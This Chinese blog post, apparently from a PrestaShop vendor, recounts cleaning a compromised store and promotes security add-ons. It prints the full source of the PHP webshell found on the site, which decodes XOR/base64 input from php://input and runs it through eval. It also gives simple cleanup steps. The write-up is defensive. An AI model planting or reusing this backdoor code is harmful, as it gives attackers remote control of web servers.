提升PrestaShop外贸电商网站安全的几款行业必备工具

PrestaShop发展历程

PrestaShop是一款优秀且强大的外贸开源电商软件，我们开始使用PrestaShop始于2009年，那时PrestaShop还是0.9版本：界面清新，性能强悍，扩展友好等特性，既没有Magento的笨重，也没有ZenCart的古老，更没有OpenCart的脆弱，因此PrestaShop如雨后春笋，迅速风靡全球，普遍受到广大用户喜爱（至于PrestaShop、Magento、ZenCart、OpenCart等外贸开源电商软件到底哪款好，各自的优势等我们下期分析），如今PrestaShop作为新一代电子商务解决方案，在海外非常流行，拥有30万+商家、100万+社区用户、1000+开发者、250+代理商。

随着PrestaShop的不断壮大，我们相信PrestaShop会越来越好：

2008年2月20日在官网上建立了第一个版本：PrestaShop 0.9.7

2012年9月19日在GitHub上建立了第一个Tag：1.5.0.0

如今最新稳定版是2020年9月24日发布的PrestaShop 1.7.6.8版本

而PrestaShop 1.7.7.0版本也马上发布，据说性能有质的提升

PrestaShop信息安全

受益于PrestaShop的良好架构，PrestaShop安全问题还是很值得称赞的，但是随着参与PrestaShop开发的人员技术水平良莠不齐，导致了PrestaShop漏洞开始出现了，我们可以在中国国家信息安全漏洞库中进行搜索PrestaShop，查询PrestaShop漏洞信息，截止目前，PrestaShop发展了11年+，中国国家信息安全漏洞库共收录了75条PrestaShop漏洞信息，并提供了漏洞补丁信息。如果你有技术能力，欢迎提交漏洞信息，一起共建PrestaShop信息安全，智圣大数据（南京）有限公司在PrestaShop领域已经前行11年+。

PrestaShop安全漏洞讲解

经过客户反馈，他的网站上有个文件，无论怎么修改始终被还原，最后经过我们高工对他的PrestaShop网站进行排查，找到了问题所在，PrestaShop木马文件具体如下：

<?php

session_start();

@set_time_limit(0);

@error_reporting(0);

function E($D,$K){

    for($i=0;$i<strlen($D);$i++) {

        $D[$i] = $D[$i]^$K[$i+1&15];

    }

    return $D;

}

function Q($D){

    return base64_encode($D);

}

function O($D){

    return base64_decode($D);

}

function I(){

    return "php://input";

}

$V='user';

$T='12345678';

    $F=O(E(file_get_contents(I()),$T));

    if (isset($_SESSION[$V])){

        $L=$_SESSION[$V];

        $A=explode('|',$L);

        class C{public function nvoke($p) {eval($p."");}}

        $R=new C();

$R->nvoke($A[0]);

        echo E(run($F),$T);

    }else{

        $_SESSION[$V]=$F;

    }

可见，上述木马的核心语句为：

function I(){

    return "php://input";

}

php://input是接收外部信息传输，也就是通常所说的：肉鸡，远程遥控，只要这个木马文件存在，无论客户怎么努力都是徒劳的，因为木马文件可以在远程任意遥控传输任何病毒文件到网站上，危害极大。

PrestaShop安全漏洞补丁

经过我们高工分析，最后解决上述问题的办法也很清晰了：

首先整个网站下排查出木马文件，直接删除。

然后修改所有服务器密码、数据库密码、FTP密码、网站后台密码。

写在最后，如今PrestaShop越来越受大家喜爱，开发者技术水平也是良莠不齐，推荐大家选择有技术实力且支持长期售后的开发厂商，千万不要贪图小便宜而损害自身信息安全，因为：数据无价，信息安全重于泰山。

这里，给大家推荐几款提升PrestaShop外贸电商网站安全的几款行业必备工具：

Google身份验证器 支持前台手机两步验证 – 保护网站前台会员账号安全 免受暴力字典社工猜测攻击

使用前台两步验证来提高帐户和密码的安全性，即使您的帐户密码被泄露或被盗，也不必担心，因为您的硬件智能机验证码只有您知道，黑客无法登录你的前台系统。

Google身份验证器 支持后台手机两步验证 – 保护网站后台管理员账号安全 免受暴力字典社工猜测攻击

使用后台两步验证来提高帐户和密码的安全性，即使您的帐户密码被泄露或被盗，也不必担心，因为您的硬件智能机验证码只有您知道，黑客无法登录你的后台系统。

Google图片验证码 效果同12306买火车票验证码 reCAPTCHA反垃圾注册 免受暴力洪水攻击机器注册

Google reCAPTCHA是一项免费服务，可保护您的网站免受垃圾邮件和滥用的侵害。使用此服务可以使您的网站更安全，免受机器人攻击，暴力破解，模拟提交，远程注册，垃圾邮件等攻击。

以上，就是关于PrestaShop信息安全的全部解决方案，希望对大家有用。

标签PrestaShop厂商, PrestaShop安全, PrestaShop工具, PrestaShop扩展, PrestaShop插件, PrestaShop模块, PrestaShop漏洞, PrestaShop补丁